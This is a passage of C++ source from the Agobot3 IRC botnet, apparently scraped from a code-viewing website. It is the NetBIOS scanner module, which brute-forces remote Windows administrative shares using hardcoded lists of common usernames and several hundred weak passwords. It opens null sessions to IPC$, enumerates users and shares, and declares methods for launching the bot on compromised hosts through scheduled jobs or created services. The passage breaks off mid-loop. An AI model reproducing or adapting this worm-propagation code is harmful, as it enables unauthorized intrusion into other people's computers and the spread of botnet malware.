📄 nbscanner.cpp.svn-base
字号:
/* Agobot3 - a modular IRC bot for Win32 / Linux
Copyright (c) 2003 Ago
All rights reserved.
This is private software, you may redistribute it under the terms of
the APL(Ago's Private License) which follows:
Redistribution and use in binary forms, with or without modification,
are permitted provided that the following conditions are met:
1. The name of the author may not be used to endorse or promote products
derived from this software without specific prior written permission.
2. The binary may not be sold and/or given away for free.
3. The licensee may only create binaries for his own usage, not for any
third parties.
Redistribution and use in source forms, with or without modification,
are not permitted.
THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR
IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */
#include "main.h"
#include "mainctrl.h"
#include "utility.h"
#ifdef WIN32
#include "resource.h"
#include <lmat.h>
typedef struct shareinfo_s
{ CString sName;
CString sRemark; } shareinfo;
typedef struct userinfo_s
{ CString sName;
CString sServer; } userinfo;
#define lenof(x) (sizeof(x)/sizeof(x)[0])
class CScannerNetBios : public CScannerBase
{
public:
CScannerNetBios();
virtual ~CScannerNetBios() throw() { }
bool Exploit();
protected:
NET_API_STATUS m_NetApiStatus;
USE_INFO_2 m_UseInfo;
USER_INFO_1 *m_UserInfo;
SHARE_INFO_1* m_ShareInfo;
WCHAR m_wszHost[MAX_PATH];
WCHAR m_wszServer[MAX_PATH];
WCHAR m_wszResource[MAX_PATH];
bool m_bGotShares;
bool m_bGotUsers;
list<userinfo*> m_lUsers;
list<shareinfo*> m_lShares;
bool NullSession();
bool CloseSession();
bool GetShares(list<shareinfo*> *lpShares);
bool GetUsers(list<userinfo*> *lpUsers);
bool AuthSession(const char *user, const char *password);
bool Exploit(const char *share, const char *host, const char *user, const char *password);
bool StartViaNetScheduleJobAdd(const char *share, const char *host, const char *user, const char *password);
bool StartViaCreateService(const char *share, const char *host, const char *user, const char *password);
};
char *names[] = { "Administrator", "Administrateur" ,"Coordinatore","Administrador",
"Verwalter","Ospite", "kanri", "kanri-sha", "admin", "administrator", "Default", \
"Convidado", "mgmt", "Standard", "User", "Administrat鰎", \
"administrador", "Owner", "user", "server", \
"Test", "Guest", "Gast", "Inviter", "a", "aaa", "abc", "x", "xyz", \
"Dell", "home", "pc", "test", "temp", "win", "asdf", "qwer", \
"OEM", "root", "wwwadmin", "login", "", \
"owner", "mary", "mike", "george", "jim", "tim", "tom", \
"stacy", "stacey", "colin", "mark", "erik", "peter", "patrick", \
"bill", "steve", "dick", "stefan", "steven", "kate", "kt", \
"karl", "mypc", \
"admins", "computer", "xp", \
"OWNER", "mysql", "sql", "database", "teacher", "student", \
NULL };
char *pwds[] = { "admin", "Admin", "password", "Password", "1", "12", "123", "1234", "beer", \
"!@#$", "asdfgh", "!@#$%", "!@#$%^", "!@#$%^&", "!@#$%^&*", "WindowsXP", \
"windows2k", "windowsME", "windows98", "windoze", "hax", "dude", "owned", \
"lol", "ADMINISTRATOR", "rooted", "noob", "TEMP", "share", "r00t", "freak", \
"ROOT", "TEST", "SYSTEM", "LOCAL", "SERVER", "ACCESS", "BACKUP", "computer", \
"fucked", "gay", "idiot", "Internet", "test", "2003", "2004", "backdoor", \
"whore", "wh0re", "CNN", "pwned", "own", "crash", "passwd", "PASSWD", "iraq", \
"devil", "linux", "UNIX", "feds", "fish", "changeme", "ASP", "PHP", "666", \
"BOX", "Box", "box", "12345", "123456", "1234567", "12345678", "123456789", \
"654321", "54321", "111", "000000", "00000000", "11111111", "88888888", "fanny", \
"pass", "passwd", "database", "abcd", "oracle", "sybase", "123qwe", "fool", \
"server", "computer", "Internet", "super", "123asd", "ihavenopass", "West", \
"godblessyou", "enable", "xp", "23", "2002", "2600", "0", "110", "2525", "newfy", \
"111111", "121212", "123123", "1234qwer", "123abc", "007", "alpha", "1776", "newfie", \
"patrick", "pat", "administrator", "root", "sex", "god", "foobar", "1778", \
"a", "aaa", "abc", "test", "temp", "win", "pc", "asdf", "secret", "drugs", \
"qwer", "yxcv", "zxcv", "home", "xxx", "owner", "login", "Login", "west", \
"Coordinatore", "Administrador", "Verwalter", "Ospite", "administrator",\
"Default", "administrador", "admins", "teacher", "student", "superman", "wmd", \
"supersecret", "kids", "penis", "wwwadmin", "database", "changeme", "dope", \
"test123", "user", "private", "69", "root", "654321", "xxyyzz", "asdfghjkl", \
"mybaby", "vagina", "pussy", "leet", "metal", "work", "school", "mybox", \
"box", "werty", "baby", "porn", "homework", "secrets", "x", "z", "bong", \
"qwertyuiop", "secret", "Administrateur", "abc123", "password123", "red123", \
"qwerty", "admin123", "zxcvbnm", "poiuytrewq", "pwd", "pass", "love", "mypc", \
"texas", "Texas", "Washington", "washington", "Tennessee", "tennessee", "jackdaniels", \
"whisky", "whiskey", "azerty", "poiut", "mouse", "ordinateur", "souris", "imprimeur", "cederom", \
"c閐閞om", "bi鑢e", "biere", "moonshine", "athlon", "oil", "opteron", "閏ran", "ecran", "reseau", "carte", \
"merde", "mince", "ami", "amie", "copin", "copine", "42", "harry", "dumbledore", "hagrid", "potter", \
"hermione", "hermine", "gryffindor", "azkaban", "askaban", "cauldron", "buckbeak", \
"hogwarts", "dementor", "quidditch", "madre", "switch", \
"mypass", "pw", NULL };
char *shares[]= {"admin$", "c$", "print$", "c", "d$", "e$", NULL};
/*
Netbios Scanner starts here
scans for netbios with easy to guess passwords
*/
CScannerNetBios::CScannerNetBios() { m_szType="CScannerNetBios"; m_sScannerName.Assign("NetBios"); }
bool CScannerNetBios::Exploit()
{ if (g_pMainCtrl->m_cBot.scaninfo_level.iValue >= 2)
{
SendLocal("%s: scanning ip %s", m_sScannerName.CStr(), m_sSocket.m_szHost);
}
mbstowcs(m_wszHost, m_sSocket.m_szHost, lenof(m_wszHost));
wcscpy(m_wszServer, L"\\\\"); wcscat(m_wszServer, m_wszHost);
wcscpy(m_wszResource, m_wszServer); wcscat(m_wszResource, L"\\IPC$");
int iNameCount=0, iShareCount=0; m_lUsers.clear(); m_lShares.clear();
CloseSession();
if(NullSession()) { GetUsers(&m_lUsers); GetShares(&m_lShares); CloseSession(); }
while(names[iNameCount])
{ userinfo *pUser=new userinfo;
pUser->sName.Assign(names[iNameCount]);
pUser->sServer.Assign(m_sSocket.m_szHost);
m_lUsers.push_back(pUser);
iNameCount++; }
while(shares[iShareCount])
{ shareinfo *pShare=new shareinfo;
pShare->sName.Assign(shares[iShareCount]);
pShare->sRemark.Assign("default");
m_lShares.push_back(pShare);
iShareCount++; }
bool bExploited=false;
list<shareinfo*>::iterator iShares; iShares=m_lShares.begin();
list<userinfo*>::iterator iUsers; iUsers=m_lUsers.begin();
while(iShares!=m_lShares.end() && !bExploited && m_pNetRange.pScanner->m_bScanning)
{ while(iUsers!=m_lUsers.end() && !bExploited && m_pNetRange.pScanner->m_bScanning)
{ WCHAR wszShare[MAX_PATH];
wcscpy(m_wszServer, L"\\\\"); wcscat(m_wszServer, m_wszHost);
wcscpy(m_wszResource, m_wszServer); wcscat(m_wszResource, L"\\");
mbstowcs(wszShare, (*iShares)->sName, lenof(wszShare));
wcscat(m_wszResource, wszShare);
if(AuthSession((*iUsers)->sName.CStr(), "") && !bExploited)
{ bExploited=Exploit((*iShares)->sName.CStr(), m_sSocket.m_szHost, (*iUsers)->sName.CStr(), "");
CloseSession(); }
if(AuthSession((*iUsers)->sName.CStr(), (*iUsers)->sName.CStr()) && !bExploited)
{ bExploited=Exploit((*iShares)->sName.CStr(), m_sSocket.m_szHost, (*iUsers)->sName.CStr(), (*iUsers)->sName.CStr());
CloseSession(); }
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -